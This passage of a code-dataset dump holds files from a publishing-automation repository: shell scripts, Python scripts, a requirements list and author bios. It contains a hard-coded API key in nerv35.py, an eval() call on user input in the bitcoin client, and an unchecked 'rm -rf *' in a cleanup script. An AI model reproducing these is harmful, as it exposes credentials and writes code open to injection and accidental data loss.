tmp/$uuid/$count\".html\"\n\n\t\t\techo $h1 \"Chapter \" $count\". \"$title $h1end >> tmp/$uuid/tmp.cumulative.html\n\t\t\techo $h1 \"Chapter \" $count\". \"$title $h1end >> tmp/$uuid/stored-toc-entries.html\n\t\t\tcat tmp/$uuid\"/\"$count\".html\" >> tmp/$uuid/tmp.cumulative.html\n\n\t\t\thtml2text -style pretty -nobs tmp/$uuid/tmp.cumulative.html > tmp/$uuid/tmp.cumulative.txt\n\n\t\tfi\n\n\t\t# writes titles to descriptions temp file\n\n\t\techo $title $p >> tmp/$uuid\"/stored-descriptions.html\"\n\t\t# echo \"added\" $title \"to temporary html and txt files that hold all descriptions\" | tee --append tmp/stored-descriptions.html\t\n\t\t\n\t\t# reports on status of fetches\n\n\t\techo \"number of docs fetched so far on seed\" $seed \"is \" $count \"out of \" $doccount | tee --append $sfb_log\n\n\t\tcount=$((count+1))\n\n\t\n\tdone <fetch/$uuid/titles.txt\n" }, { "alpha_fraction": 0.699999988079071, "alphanum_fraction": 0.7799999713897705, "avg_line_length": 23.5, "blob_id": "6b0b94c3ffeaa8abf469fa1eb9f5fa7d8048247e", "content_id": "6ccf89c0a68b2a181a24434957c356c825d513de", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 51, "license_type": "permissive", "max_line_length": 28, "num_lines": 2, "path": "/conf/jobprofiles/imprints/xmedialab/xmedialabcopyrightpage.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Copyright © 2016 X Media Lab\nAll Rights Reserved\n\n" }, { "alpha_fraction": 0.8181818127632141, "alphanum_fraction": 0.8181818127632141, "avg_line_length": 43, "blob_id": "ca832220a484830e1cdd342869b43fbe24bc8690", "content_id": "c5396d7d4329c9628ea8bd5e811bc3808a65e7aa", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 44, "license_type": "permissive", "max_line_length": 43, "num_lines": 1, "path": "/conf/jobprofiles/authorbios/Eileen_Smith.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Very interested in classical music and art.\n" }, { "alpha_fraction": 0.6002084016799927, "alphanum_fraction": 0.6161862015724182, "avg_line_length": 28.37755012512207, "blob_id": "1ddff27e36f8b9ea637a4b01b585afa9204557d6", "content_id": "d15143a78b8c6a7878a76f47e1d84688369af53f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2879, "license_type": "permissive", "max_line_length": 83, "num_lines": 98, "path": "/scripts/bin/nerv35.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python\n###################################################\n# Jeffrey Herbstman\n# nerv3.py\n# Goal: Named entity recognition script to pull names/place from text\n# called as python nerv3.py text_path_or_file\n#\n# Inputs:\n# path - text file or directory containing text files\n# output - output file name\n# Outputs:\n# Output file written\n#\n###################################################\n\nfrom watson_developer_cloud import AlchemyLanguageV1\nimport argparse\nimport xml.etree.ElementTree as ET\nimport requests\nimport codecs\nimport os\n\n#=================================================\ndef listwrite(output_file,thelist):\n\tfor item in thelist:\n\t\titem.encode('utf-8')\n\t\toutput_file.write(\"%s\\n\" % item)\n\n#=================================================\n\ndef main():\n\n\ttmpdir = \"/tmp/pagekicker\"\n\n\t#personal api key saved as api_key.txt\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('path', help = \"target file or directory for NER\")\n\tparser.add_argument('outfile', help = \"target file for output\")\n\tparser.add_argument('uuid', help = \"uuid\")\n\targs = parser.parse_args()\n\n\tin_file = args.path\n\tout_file = args.outfile\n\tuuid = args.uuid\n\tfolder = os.path.join(tmpdir, uuid)\n\tprint(folder)\n\n\n\twith open(in_file, 'rb') as f:\n\t\ttext = f.read()\n\n\tAlchemyApi_Key = 'b887e176b6a650093c3d4ca635cd1b470be6584e'\n\turl = 'https://gateway-a.watsonplatform.net/calls/text/TextGetRankedNamedEntities'\n\tpayload = { 'apikey': AlchemyApi_Key,\n 'outputMode': 'xml',\n 'text': text,\n 'max_items': '3'\n }\n\n\tr = requests.post(url,payload)\n\n\troot = ET.fromstring(r)\n\n\tplace_list = ['City', 'Continent', 'Country', 'Facility', 'GeographicFeature',\\\n\t'Region', 'StateOrCounty']\n\tPeople = {}\n\tPlaces = {}\n\tOther = {}\n\n\tfor entity in root.getiterator('entity'):\n\t\tif entity[0].text == 'Person':\n\t\t\tPeople[entity[3].text]=[entity[1].text, entity[2].text]\n\t\telif entity[0].text in place_list:\n\t\t\tPlaces[entity[3].text] = [entity[1].text, entity[2].text]\n\t\telse:\n\t\t\tOther[entity[3].text] = [entity[1].text, entity[2].text]\n\n\t#print lists ordered by relevance\n\tPlaces_s = sorted(Places, key = Places.get, reverse = True)\n\tPeople_s = sorted(People, key = People.get, reverse = True)\n\tOther_s = sorted(Other, key = Other.get, reverse = True)\n\n\twith codecs.open(out_file, mode = 'w', encoding='utf-8') as o:\n\t\tlistwrite(o, People_s)\n\t\tlistwrite(o, Places_s)\n\t\tlistwrite(o, Other_s)\n\tout_file = os.path.join(folder, 'People')\n\twith codecs.open(out_file, mode= 'w', encoding='utf-8') as o:\n\t\tlistwrite(o, People_s)\n\tout_file = os.path.join(folder, 'Places')\n\twith codecs.open(out_file, mode= 'w', encoding='utf-8') as o:\n\t\tlistwrite(o, Places_s)\n\tout_file = os.path.join(folder, 'Other')\n\twith codecs.open(out_file, mode= 'w', encoding='utf-8') as o:\n\t\tlistwrite(o, Other_s)\n#=================================================\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.7192851901054382, "alphanum_fraction": 0.7215189933776855, "avg_line_length": 32.57500076293945, "blob_id": "8d2be5237f3341209191be2b8cc75bb258e984d0", "content_id": "752afb33002f74daeebaa3743401199f91bbb881", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1343, "license_type": "permissive", "max_line_length": 121, "num_lines": 40, "path": "/scripts/includes/content-collections-first.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# --booktype=\"draft-report\"\n# Front and back matter are minimized, candidate sentences for executive\n# summary are provided.\"\n\n# 1. create any unique parts of the book that are needed\n# 2. concatenates them and deliver complete.md to builder.\n\n# tweak pp_summary to create Executive_summary\n\n\nsummary_length=\"5\"\necho \"creating executive summary\"\n\"$PYTHON_BIN\" bin/PKsum-clean.py -l \"$summary_length\" -o \"$TMPDIR$uuid/exec_summary.txt\" \"$TMPDIR$uuid/clean_summary.txt\"\n\necho By \"$editedby\" >> \"$TMPDIR$uuid/titletop.md\"\necho \" \" >> \"$TMPDIR$uuid/titletop.md\"\n\necho \"# EXECUTIVE SUMMARY\" >> \"$TMPDIR$uuid/executive_summary.md\"\necho \" \" >> \"$TMPDIR$uuid/executive_summary.md\"\ncat \"$TMPDIR$uuid/exec_summary.txt\" >> \"$TMPDIR$uuid/executive_summary.md\"\n\ncat \\\n\"$TMPDIR$uuid/titletop.md\" \\\n\"$TMPDIR$uuid/executive_summary.md\" \\\n\"$TMPDIR$uuid/content_collections/content_collections_results.md\" \\\n\"$TMPDIR$uuid/add_this_content.md\" \\\n\"$TMPDIR$uuid/chapters.md\" \\\n\"$TMPDIR$uuid/googler.md\" \\\n\"$TMPDIR$uuid/googler-news.md\" \\\n\"$TMPDIR$uuid/sorted_uniqs.md\" \\\n\"$TMPDIR$uuid/analyzed_webpage.md\" \\\n\"$TMPDIR$uuid/acronyms.md\" \\\n\"$TMPDIR$uuid/sources.md\" \\\n\"$TMPDIR$uuid/yaml-metadata.md\" \\\n\"$TMPDIR$uuid/settings.md\" \\\n> \"$TMPDIR$uuid/content-collections-first.md\"\n\n# \"$TMPDIR$uuid/conclusion.md\"\n# \"$TMPDIR$uuid/appendices_front_page.md\" \\\n" }, { "alpha_fraction": 0.7066115736961365, "alphanum_fraction": 0.7066115736961365, "avg_line_length": 29.25, "blob_id": "beac0ba5b7dc6f5ebb9e78d0697017965513b2c5", "content_id": "758494a6d1872f909a8a6fb6bfb7b6f7038f02e8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 242, "license_type": "permissive", "max_line_length": 84, "num_lines": 8, "path": "/scripts/includes/keywordreader.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#meta keywords below\n\necho -n '\"' | tee --append $metadatatargetpath$uuid/\"current-import.csv\"\nwhile read keyword\ndo\n\techo -n ''$keyword', ' | tee --append $metadatatargetpath\"$uuid/current-import.csv\"\n\ndone < \"tmp/\"$uuid/$sku\"keywords.txt\"\n" }, { "alpha_fraction": 0.6064356565475464, "alphanum_fraction": 0.6193069219589233, "avg_line_length": 35.727272033691406, "blob_id": "b045ce54ff4216aebcd59925497b44ce0dce2adc", "content_id": "574b486a3c8b5ca5f1525ba28d8782dcad345b19", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2020, "license_type": "permissive", "max_line_length": 106, "num_lines": 55, "path": "/scripts_python_3/bitcoin/fileclient/fileclient.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport json\n\nfrom two1.wallet import Wallet\nfrom two1.bitrequests import BitTransferRequests\n\n# set up bitrequest client for BitTransfer requests\nwallet = Wallet()\nrequests = BitTransferRequests(wallet)\n\n# server address\nserver_url = 'http://localhost:5000/'\n\n\ndef buy_file():\n # get the file listing from the server\n response = requests.get(url=server_url+'files')\n file_list = json.loads(response.text)\n\n # print the file list to the console\n for file in range(len(file_list)):\n print((\"{}. {}\\t{}\".format(file+1, file_list[str(file+1)][0], file_list[str(file+1)][1])))\n\n try:\n # prompt the user to input the index number of the file to be purchased\n sel = eval(input(\"Please enter the index of the file that you would like to purchase:\"))\n\n # check if the input index is valid key in file_list dict\n if sel in file_list:\n print(('You selected {} in our database'.format(file_list[sel][0])))\n\n # create a 402 request with the server payout address\n sel_url = server_url+'buy?selection={0}&payout_address={1}'\n answer = requests.get(url=sel_url.format(int(sel), wallet.get_payout_address()), stream=True)\n\n if answer.status_code != 200:\n print(\"Could not make an offchain payment. Please check that you have sufficient buffer.\")\n else:\n # open a file with the same name as the file being purchased and stream the data into it.\n filename = file_list[str(sel)][0]\n\n with open(filename, 'wb') as fd:\n for chunk in answer.iter_content(4096):\n fd.write(chunk)\n fd.close()\n print('Congratulations, you just purchased a file for bitcoin!')\n\n else:\n print(\"That is an invalid selection.\")\n\n except ValueError:\n print(\"That is an invalid input. Only numerical inputs are accepted.\")\n\nif __name__ == '__main__':\n buy_file()\n" }, { "alpha_fraction": 0.6346153616905212, "alphanum_fraction": 0.6730769276618958, "avg_line_length": 16.33333396911621, "blob_id": "85e2d4986aca3a7c97c805cd43d11c5cd0d9f3e0", "content_id": "27cc48a69f678c8243dc2dc856073ef5ee0bf782", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 52, "license_type": "permissive", "max_line_length": 20, "num_lines": 3, "path": "/test/dat_test.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# xform launches DAT\nbin/xform.sh $1 $2\n" }, { "alpha_fraction": 0.7470816969871521, "alphanum_fraction": 0.7626459002494812, "avg_line_length": 255, "blob_id": "03492ee1eea484773210a913a2cfbd7fbb3294c7", "content_id": "4cb06754221c380049a547b1f9c313f9e8cab2df", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 257, "license_type": "permissive", "max_line_length": 255, "num_lines": 1, "path": "/conf/jobprofiles/authorbios/Iron_Mike.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Iron Mike was built by United States Robots and Mechanical Men (USR) in the year 2049, although he was original designed by Rossum's Universal Robots (RUR). When he's not writing, he enjoys playing with his pet mouse, Algernon. His favorite song is \"Daisy Bell\".\n" }, { "alpha_fraction": 0.6672897338867188, "alphanum_fraction": 0.6915887594223022, "avg_line_length": 25.799999237060547, "blob_id": "cb67b2aabd4dcdbca2a8033aca79be8607f9c0bf", "content_id": "d39cd6cc3a8daed10dda29eeaa00366890e3e267", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 535, "license_type": "permissive", "max_line_length": 114, "num_lines": 20, "path": "/scripts_python_3/bin/convert_user_webform_to_test.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 22 11:16:16 2015\n\n@author: fred\n\nConverts webform xml file submitted by user to anonymized format suitable \nfor testing\n\"\"\"\n\nimport fileinput\nimport re\nimport os\n\nscriptpath_substitution = '<scriptpath>' + os.getcwd() + '</scriptpath>'\n \nfor line in fileinput.input():\n line = re.sub('<customer_email>.*</customer_email>','<customer_email>[email protected]</customer_email>', line.rstrip())\n line = re.sub('<scriptpath>.*</scriptpath>', scriptpath_substitution, line.rstrip())\n print(line)" }, { "alpha_fraction": 0.4902634620666504, "alphanum_fraction": 0.6975945234298706, "avg_line_length": 15.471697807312012, "blob_id": "e06a7fcef9a1516abd6bb789bcee65ae1e7c4aa7", "content_id": "f22317b891b72c103626fc00ba433b109cddf1e1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 873, "license_type": "permissive", "max_line_length": 30, "num_lines": 53, "path": "/all_pk_and_pk21_requirements.txt", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "arrow==0.8.0\nbase58==0.2.3\nbeautifulsoup4==4.5.1\nclick==6.6\ndecorator==4.0.10\ndocker-py==1.8.0\nflake8==3.0.4\nFlask==0.10.1\nfuncsigs==1.0.2\nfuture==0.15.2\nhealthcheck==1.3.1\nitsdangerous==0.24\nJinja2==2.8\njsonrpcclient==2.0.1\njsonrpcserver==3.1.1\njsonschema==2.5.1\nMarkupSafe==0.23\nmccabe==0.5.2\nmnemonic==0.13\nnetworkx==1.11\nnltk==3.2.1\nnumpy==1.11.1\npath.py==8.2.1\npbkdf2==1.3\npbr==1.10.0\npexpect==4.2.1\nprotobuf==3.0.0a3\npsutil==4.3.0\nptyprocess==0.5.1\npy==1.4.31\npyaes==1.6.0\npycodestyle==2.0.0\npyflakes==1.2.3\npysolr==3.5.0\npytest==3.0.2\npython-dateutil==2.5.3\nPyYAML==5.4.1\nrequests==2.11.1\nscikit-learn==0.17.1\nscipy==0.18.1\nsha256==0.1\nsix==1.10.0\nsklearn==0.0\nstevedore==1.17.1\ntabulate==0.7.5\ntwo1==3.9.1\nvirtualenv==15.0.3\nvirtualenv-clone==0.2.6\nvirtualenvwrapper==4.7.2\nwatson-developer-cloud==0.18.0\nwebsocket-client==0.37.0\nWerkzeug==0.11.10\nwikipedia==1.4.0\n" }, { "alpha_fraction": 0.6714285612106323, "alphanum_fraction": 0.6714285612106323, "avg_line_length": 13, "blob_id": "6f8aa4545fc7e004231f92de24a9820a94440c21", "content_id": "47709106fc7c7cf33884793c83756edf2a2b393a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 70, "license_type": "permissive", "max_line_length": 41, "num_lines": 5, "path": "/scripts/bin/cleanup_tmp_directories.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!bin/bash\n\n# file cleanup\n\ncd $SFB_MAGENTO_HOME/var/import; rm -rf *\n" }, { "alpha_fraction": 0.6635817885398865, "alphanum_fraction": 0.6883441805839539, "avg_line_length": 23.527606964111328, "blob_id": "ddbd4e916c603fb460f941cf23cf9bbc2122da4d", "content_id": "533792341e36e05fa9aa454665a4a649872c195e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3998, "license_type": "permissive", "max_line_length": 240, "num_lines": 163, "path": "/scripts/bin/memecard.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n\n\necho \"****MEMECARD****\"\n\nif shopt -q login_shell ; then\n\n\tif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\t\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\t\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\t\techo \"exiting\"\n\t\texit 1\n\telse\n\t\t. \"$HOME\"/.pagekicker/config.txt\n\t\techo \"read config file from login shell $HOME\"\"/.pagekicker/config.txt\"\n\tfi\nelse\n\t. /home/$(whoami)/.pagekicker/config.txt #hard-coding /home is a hack\n\techo \"read config file from nonlogin shell /home/$(whoami)/.pagekicker/config.txt\"\nfi\n\ncd $scriptpath\n\nTMPDIR=\"/tmp/pagekicker/\"\nuuid=\"memecard\" && mkdir -p $TMPDIR\"$uuid\"\nconfdir=\"$confdir\"\nmemewidth=1200\nmemeheight=630\nmemebackgroundcolor=\"white\"\nmemefillcolor=\"black\"\nmemeheadlinefont=\"DejaVu-Sans-Bold\"\n\n. includes/set-variables.sh\n\necho \"version is\" $SFB_VERSION\n\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"for help review source code for now\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n-U|--passuuid)\npassuuid=$2\nshift 2\n;;\n--passuuid=*)\npassuuid=${1#*=}\nshift\n;;\n-f|--infile)\ninfile=$2\nshift 2\n;;\n--infile=*)\ninfile=${1#*=}\nshift\n;;\n-t|--tldr)\ntldr=$2\nshift 2\n;;\n--tldr=*)\ntldr=${1#*=}\nshift\n;;\n-F|--font)\nfont=$2\nshift 2\n;;\n--font=*)\nfont=${1#*=}\nshift\n;;\n-w|--memewidth)\nmemewidth=$2\nshift 2\n;;\n--memewidth=*)\nmemewidth=${1#*=}\nshift\n;;\n-h|--memeheight)\nmemeheight=$2\nshift 2\n;;\n--memeheight=*)\nmemeheight=${1#*=}\nshift\n;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\n\nif [ ! \"$passuuid\" ] ; then\n\techo \"creating uuid\"\n\tuuid=$(\"$PYTHON_BIN\" -c 'import uuid; print(uuid.uuid1())')\n\techo \"uuid is\" $uuid | tee --append $xform_log\n\tmkdir -p -m 777 \"$TMPDIR\"$uuid\nelse\n\tuuid=$passuuid\n\techo \"received uuid \" $uuid\n\tmkdir -p -m 777 \"$TMPDIR\"$uuid\nfi\n\ncp \"$infile\" $TMPDIR$uuid/tmp.md\n\n# create title bar & version label\nconvert -units pixelsperinch -density 300 -size 1000x50 -border 5 -background \"$backgroundcolor\" -font \"$memeheadlinefont\" -fill \"$memefillcolor\" -background \"$memebackgroundcolor\" -gravity center caption:\"$tldr\" $TMPDIR$uuid/toplabel1.png\nconvert -units pixelsperinch -density 300 -size 500x25 -font \"Utopia\" -background white -fill black -gravity southeast caption:\"$SFB_VERSION\" $TMPDIR$uuid/version.png\n\n# prepend pagenumbering to tmp file\n\necho -e '\\pagenumbering{gobble}\\n' | cat - $TMPDIR$uuid/\"tmp.md\" > $TMPDIR$uuid/out && mv $TMPDIR$uuid/out $TMPDIR$uuid/\"tmp.md\"\n\n# make pdf\n\n# make pdf\n\ncat $TMPDIR$uuid/\"tmp.md\" | \\\n pandoc --latex-engine=xelatex --template=$confdir\"pandoc_templates/nonumtemplate.tex\" \\\n-o $TMPDIR$uuid/memecard.pdf\n# -V \"geometry:paperheight=5.0in\" -V \"geometry:paperwidth=7.0in\"\n\n# make png of text\nconvert -density 400 $TMPDIR$uuid/memecard.pdf -trim $TMPDIR$uuid/memecard.png\n# \"if error issued here see comments in includes/1000x3000skyscraper.sh for explanation\"\n\n# lay logo & version onto bottom label\n\nconvert $TMPDIR$uuid/memecard.png -border 30 $TMPDIR$uuid/memecard.png\n# put logo on 1000 px wide & trim\nconvert $scriptpath\"assets/pk35pc.jpg\" -resize 20% $TMPDIR$uuid/pksmall.jpg\nconvert $TMPDIR$uuid\"/pksmall.jpg\" -gravity west -background white -extent 1024x50 \\\n$TMPDIR$uuid/memecardlogo.png\n convert -gravity center $TMPDIR$uuid/memecardlogo.png -gravity southeast $TMPDIR$uuid/version.png -composite $TMPDIR$uuid/bottom.png\n\n# lay image of text onto card background\nmontage $TMPDIR$uuid/toplabel1.png \\\n$TMPDIR$uuid\"/memecard.png\" \\\n$TMPDIR$uuid/bottom.png \\\n-geometry \"$memewidth\"x\"$memeheight\" -border 10 -tile 1x10 -mode concatenate \\\n$TMPDIR$uuid/memecard.png\n\n# create card for delivery to desitnation\n\nconvert $TMPDIR$uuid\"/memecard.png\" -trim -border 30 $TMPDIR$uuid/memecard_delivery.png\n\necho \"built memecard and delivered it to $TMPDIR$uuid/memecard_delivery.png\"\n" }, { "alpha_fraction": 0.6396163702011108, "alphanum_fraction": 0.6503135561943054, "avg_line_length": 20.0155029296875, "blob_id": "e884aec56192db1149805905d30c768b7604be23", "content_id": "b922fc46898f7bd20672e43a93100a470bfe2873", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2711, "license_type": "permissive", "max_line_length": 117, "num_lines": 129, "path": "/scripts/naughty-dupes.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# searches for permitted content in Wikipedia\n\n# requires seed value\n\nstarttime=$(( `date +%s` ))\n\n# parse the command-line very stupidly\n\necho \"-NAUGHTY-NAUGHTY-DUPLICATE-DUPLICATE\" | tee --append $xform_log\necho \"starting to screen list of search terms for illegal ones\"| tee --append $xform_log\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"requires PDF filename; example: montageur.sh filename\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--infile)\ninfile=$2\nshift 2\n;;\n--infile=*)\ninfile=${1#*=}\nshift\n;;\n--outfile)\noutfile=$2\nshift 2\n;;\n--outfile=*)\noutfile=${1#*=}\nshift\n;;\n--environment)\nenvironment=$2\nshift 2\n;;\n--environment=*)\nenvironment=${1#*=}\nshift\n;;\n--passuuid)\npassuuid=$2\nshift 2\n;;\n--passuuid=*)\npassuuid=${1#*=}\nshift\n;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$infile\" ]; then\n echo \"ERROR: option '--in[infile]' not given. See --help\" >&2\n exit 1\nelif [ ! \"$outfile\" ] ; then\n\techo \"ERROR: option '--outfile[outfile]' not given. See --help\" >&2\n \texit 1\nfi\n\nif [ ! \"$passuuid\" ] ; then\n\techo \"creating uuid\"\n\tuuid=$(python -c 'import uuid; print uuid.uuid1()')\n\techo \"uuid is\" $uuid | tee --append $xform_log\n\tmkdir -p -m 755 tmp/$uuid\n\tmkdir -p -m 755 tmp/$uuid/montageur\nelse\n\tuuid=$passuuid\n\techo \"received uuid \" $uuid\nfi\n\n\n. ../\"conf/config.txt\"\necho \"running in $environment\" | tee --append $xform_log\n\n. $scriptpath\"includes/set-variables\"\n\necho \"software id in\" \"$environment\" \"is\" $SFB_VERSION | tee --append $sfb_log\n\ncd $scriptpath\necho \"scriptpath is\" $scriptpath\n\nexport PATH=$PATH:/opt/bitnami/java/bin\n\n# echo \"PATH is\" $PATH\n\necho \"beginning to screen out naughty and duplicate seeds\" >> $sfb_log\n\nrm $outfile # clean up from last time overwrites previous outfile\n\nwhile read -r line; do \n\nif grep -q \"$line\" \"seeds/disallowed-seeds.txt\"\nthen \n\techo \"ncp_err_code:disallowed the seed \"$line \"was disallowed by policy\" | tee --append $sfb_log\n # figure out how to send an error report to the user here\n \n\nelif grep -q \"$line\" $LOCAL_DATA\"seeds/history/seed-history.csv\"\nthen \n\techo \"ncp_err_code:duplicate the seed \"$line \" has previously been submitted to PageKicker\" | tee --append $sfb_log\n\n # figure out how to send an error report to the user here\n\nelse\n\techo \"ncp_err_code:ok\" $line | tee --append $LOCAL_DATA/seeds/\"allowed/allowed-history.txt\"\n\techo \"$line\" >> \"$outfile\"\nfi\n\ndone<\"$infile\" \n\nexit 0\n" }, { "alpha_fraction": 0.6031909584999084, "alphanum_fraction": 0.6160576343536377, "avg_line_length": 20.82022476196289, "blob_id": "5472482d931bcc379ab0d6def69f24a85913cd7d", "content_id": "4998e9788225dae5df4515c101fdc1f3be89636b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1943, "license_type": "permissive", "max_line_length": 107, "num_lines": 89, "path": "/scripts/PDF_renamer.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# renames files per PDF title metadata\n\n# this script has not been heavily tested but is nondestructive, i.e. it only makes changes on copied files\n\n# input: path to directory containing PDF files\n# output: directory containing same files renamed with document title from PDF metadata\n# requires pdftk\n\n# relative path to PageKicker config file here (run from $scriptpath)\n\n. ../conf/config.txt\n\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"requires directory name\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--pdfdir)\npdfdir=$2\nshift 2\n;;\n--pdfdir=*)\npdfdir=${1#*=}\nshift\n;;\n--renamed_files_dir)\nrenamed_files_dir=$2\nshift 2\n;;\n--renamed_files_dir=*)\nrenamed_files_dir=${1#*=}\nshift\n;;\n\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$pdfdir\" ]; then\n\techo \"ERROR: option '--pdfdir[pdfdir]' not given. See --help\" >&2\n \texit 1\nelif [ ! \"$renamed_files_dir\" ]; then\n \techo \"ERROR: option '--renamed_files_dir[renamed_files_dir]' not given. See --help\" >&2\n exit 1\nelse\n\techo \"proceeding\"\nfi\n\nmkdir -p -m 755 \"$renamed_files_dir\"\n\ncd \"$pdfdir\"\ni=1\nfor file in *.pdf\n\t\ndo\n\ttitle=`pdftk $file dump_data output| sed -n '/InfoKey: Title/{n;p}'`\n\techo \"title is\" $title\n\tcd \"$scriptpath\"\n\tif [ -z \"$title\" ]; then\n\t\tcp \"$pdfdir\"/\"$file\" \"$renamed_files_dir\"\n\telse\n\t\tsafe_file_name=$(echo \"$title\" | cut -d\":\" -f2 | sed -e 's/[^A-Za-z0-9._-]/_/g' -e '1s/^.//' )\n\t\tj=$( printf \"%04d\" \"$i\" )\n\t\tcp \"$pdfdir\"/\"$file\" \"$renamed_files_dir\"/\"$safe_file_name\"-\"$j\".pdf\n\tfi\n\t(( i++ ))\n\tcd \"$pdfdir\"\ndone\ncd $scriptpath\necho \"renamed files in new directory $renamed_files_dir\"\nls -lart \"$renamed_files_dir\"\n\n" }, { "alpha_fraction": 0.658450722694397, "alphanum_fraction": 0.6678403615951538, "avg_line_length": 29.428571701049805, "blob_id": "af698539a4d7f97da9832c7c939d51052d475ce2", "content_id": "4bd2a5042900d537777fe5603fd3e72679905cfc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 852, "license_type": "permissive", "max_line_length": 88, "num_lines": 28, "path": "/test/memecard_test.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# version1.0 test suite\n# runs test of all production-visible scripts\n\necho \"------------------------version 1.0-------------------------------\"\n\nif shopt -q login_shell ; then\n\n\tif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\t\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\t\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\t\techo \"exiting\"\n\t\texit 1\n\telse\n\t\t. \"$HOME\"/.pagekicker/config.txt\n\t\techo \"read config file from login shell $HOME\"\"/.pagekicker/config.txt\"\n\tfi\nelse\n\t. /home/$(whoami)/.pagekicker/config.txt #hard-coding /home is a hack\n\techo \"read config file from nonlogin shell /home/$(whoami)/.pagekicker/config.txt\"\nfi\n\ncd $scriptpath\necho \"$import_available_on_machine importing\"\n. includes/set-variables.sh\n\nbin/memecard.sh --infile ../test/data/FBadvisory.md --tldr \"Addicted to Facebook?\"\n" }, { "alpha_fraction": 0.7857142686843872, "alphanum_fraction": 0.7857142686843872, "avg_line_length": 55, "blob_id": "5a32e55b021f1425d3ef2c9f56a5701d736a72eb", "content_id": "75c6d73a47761389ee493da748004e1e596aaddc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 56, "license_type": "permissive", "max_line_length": 55, "num_lines": 1, "path": "/conf/jobprofiles/authorbios/Grognard_bio.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Gustavious Grognard is a veteran wargamer and military history fan.\n" }, { "alpha_fraction": 0.8468468189239502, "alphanum_fraction": 0.8468468189239502, "avg_line_length": 110, "blob_id": "3b403b11959b88cead777a2b203fce40b9d68cbd", "content_id": "ce66a6024917dbcaceededd530ea936edc4d051f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 111, "license_type": "permissive", "max_line_length": 110, "num_lines": 